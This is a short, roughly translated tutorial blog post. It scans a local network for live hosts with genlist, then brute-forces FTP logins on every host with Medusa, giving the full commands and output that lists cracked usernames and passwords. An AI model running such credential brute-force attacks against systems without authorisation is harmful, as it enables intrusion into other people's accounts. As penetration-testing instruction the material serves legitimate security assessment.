Checking the Weakness of FTP Credentials Enter with Medusa . [ by: Mohamed Ahmed ]

This guide will show you how to perform a simple ftp or any other service that supports Medusa to check the weakness of the login data.

I will be using genlist to compile a list of the live hosts that are running on the network and have result in a txt file that Medusa can use to perform a brute force attack on all hosts live

I'll start with the path to find the range the network is using

code

mohamedx@kl:~# route -n |grep eth1

192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1

0.0.0.0 192.168.1.254 0.0.0.0 UG 0 0 0 eth1

mohamedx@kl~#

In the above example on the network that I am connected to you are using the IP range 192.168.1.0 and the

default gateway 192.168.1.254, so I will analyze the whole netmask for hosts to live with genlist

Code

mohamedx@kl:~# genlist -s 192.168.1.\* > host_c-intruder3s

mohamedx@kl:~# cat host_c-intruder3s

192.168.1.67

192.168.1.68

192.168.1.69

192.168.1.77

192.168.1.78

192.168.1.101

192.168.1.254

mohamedx@kl:~#

Now I have obtained a list of live hosts I can go to use Medusa

Code:

medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp

• Medusa Options

Code:

-v level of detail six

H- Customer List

-U list Username

-P list Password

-M FTP module type, TELNET, SSH, HTTP, etc.

Note For this tutorial I will only use a small user / password List To save time

My output

mohamedx@kl: ~ # medusa -v 6 -H host_c-intruder3s -U username.txt -P pwords.txt -M ftp | grep "ACCOUNT FOUND"

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

ACCOUNT FOUND: ftp Host: 192.168.1.67 User: zerocold Password: password123 SUCCESS

ACCOUNT FOUND: ftp Host: 192.168.1.67 User: offsec Password: password SUCCESS

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

NOTICE: ftp.mod Socket is no longer valid. Server likely dropped connection. Establishing new session.

ACCOUNT FOUND: ftp Host: 192.168.1.68 User: michael Password: jhonadmin SUCCESS

ACCOUNT FOUND: ftp Host: 192.168.1.77 User: rafael Password: admin123 SUCCESS

mohamedx@kl: ~ #

In the previous example I used | grep "account is found" to cut most of the output, so I only receive user names and passwords, but if I were to do this on the actual target it is not my home network i running normally so I can see to what extent the attack is on.

greetings // M.Ahmed